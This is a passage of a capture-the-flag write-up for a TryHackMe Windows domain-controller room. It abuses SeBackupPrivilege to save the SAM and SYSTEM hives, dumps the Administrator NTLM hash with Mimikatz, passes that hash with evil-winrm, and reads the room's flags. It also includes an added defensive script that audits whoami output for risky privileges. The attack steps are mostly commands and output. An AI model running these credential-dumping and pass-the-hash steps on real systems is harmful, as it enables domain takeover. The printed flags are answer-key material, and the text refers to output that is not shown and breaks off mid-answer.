This privilege causes the system to grant all read access control to any file (only read). Use it to read the password hashes of local Administrator accounts from the registry and then use "psexec" or "wmiexec" with the hash (PtH). This attack won't work if the local Administrator is disabled, or if it is configured so that a local admin isn't admin when connected remotely.

We can use this privilege to read any file, including the registry hive files, and recover the Administrator hash from them.

About SeRestorePrivilege:

Write access control to any file on the system, regardless of the file's ACL. You can modify services, do DLL hijacking, set a debugger (Image File Execution Options)... a lot of options to escalate.

DLL hijacking works by writing a DLL file to any path.

Because DLL hijacking also requires the ability to restart a system service, we focus on SeBackupPrivilege instead.
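The whoami output above is exactly what a reviewer would parse to decide that this account is admin-equivalent before anything is exploited. The following is an added example, not part of the original writeup: it reads the text layout that `whoami /all` prints and flags the privileges and builtin groups that bypass ACLs or grant remote logon. The sample is constructed in that layout from the groups and privileges shown for xyan1d3; the privilege descriptions and well-known group SIDs are the documented ones.

```python
import re

# Constructed sample in the layout "whoami /all" prints (a subset of the output above).
SAMPLE_WHOAMI = r"""
GROUP INFORMATION
-----------------

Group Name                      Type             SID          Attributes
=============================== ================ ============ ==================================================
Everyone                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators        Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                   Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that let the holder bypass ACLs or reach SYSTEM. "Disabled" in whoami
# only means not enabled in the current token; the right is still held.
SENSITIVE_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (SAM/SYSTEM hives, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of its ACL (service binaries, DLL paths)",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
    "SeManageVolumePrivilege": "raw access to volumes",
}
# Well-known builtin group SIDs that are admin-equivalent or grant remote logon.
SENSITIVE_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
    "S-1-5-32-580": "Remote Management Users (WinRM logon)",
}

PRIV_RE = re.compile(r"^(Se[A-Za-z]+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")
SID_RE = re.compile(r"\s(S-1-[0-9-]+)\s")


def parse_whoami(text):
    """Return {'privileges': [(name, description, state)], 'group_sids': [sid, ...]}."""
    privileges, sids = [], []
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privileges.append((m.group(1), m.group(2).strip(), m.group(3)))
            continue
        m = SID_RE.search(line)
        if m:
            sids.append(m.group(1))
    return {"privileges": privileges, "group_sids": sids}


def audit_token(text):
    """List the findings a reviewer would raise for this token."""
    parsed = parse_whoami(text)
    findings = []
    for sid in parsed["group_sids"]:
        if sid in SENSITIVE_GROUP_SIDS:
            findings.append(f"group {sid} ({SENSITIVE_GROUP_SIDS[sid]})")
    for name, _, state in parsed["privileges"]:
        if name in SENSITIVE_PRIVILEGES:
            findings.append(f"{name} [{state}]: {SENSITIVE_PRIVILEGES[name]}")
    return findings


if __name__ == "__main__":
    for finding in audit_token(SAMPLE_WHOAMI):
        print(finding)
```

On this box the two flagged privileges come from Backup Operators membership; the mitigation is to treat that group as Tier 0 on domain controllers and keep ordinary users out of it, since the backup right alone is enough to copy the hives the next section reads.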

I did some research and found this article

Export the SAM and SYSTEM hives to files

reg save HKLM\SAM sambkup.hiv

reg save HKLM\SYSTEM systembkup.hiv

Extract the NTLM hash with Mimikatz (the PowerShell policy and AMSI bypasses have to be repeated on every login)

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> Invoke-Mimikatz -Command '"lsadump::sam /sam:sambkup.hiv /system:systembkup.hiv"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::sam /sam:sambkup.hiv /system:systembkup.hiv
Domain : HAVEN-DC
SysKey : f1582a79dd00631b701d3d15e75e59f6
Local SID : S-1-5-21-1320649623-3804182013-2902712059

SAMKey : eaa05099b2f12f633fca797270e3e4fa

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 9689931bed40ca5a2ce1218210177f0c

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

Pass the hash to log in as Administrator

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# evil-winrm -i 10.10.246.107 -u Administrator -H 9689931bed40ca5a2ce1218210177f0c

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
raz0rblack\administrator

We now have administrator privileges on the domain controller.

Read root.xml

*Evil-WinRM* PS C:\Users\Administrator> cat root.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">Administrator</S>
      <SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS>
    </Props>
  </Obj>
</Objs>

Hex-decoding the password field (the author used HackBar) gives:

Damn you are a genius.
But, I apologize for cheating you like this.

Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}

Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.

If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.


Another file, cookie.json:

*Evil-WinRM* PS C:\Users\Administrator> cat cookie.json
{
  auth : "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2luLnBocAoKRW5qb3kgeW91ciBDb29raWU="
}

After base64 decoding:

Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.

And stop putting 'OR '1'='1 inside login.php

Enjoy your Cookie

Move to another user's folder

*Evil-WinRM* PS C:\Users\twilliams> ls

    Directory: C:\Users\twilliams

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        2/25/2021  10:18 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        2/25/2021  10:20 AM             80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe

The .exe with the very long name cannot be executed (I tried, and it failed).

Read it directly instead

*Evil-WinRM* PS C:\Users\twilliams> cat definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe
THM{5144f2c4107b7cab04916724e3749fb0}

What is the complete top secret?

Download the image C:\Program Files\Top Secret\top_secret.png

A: Wq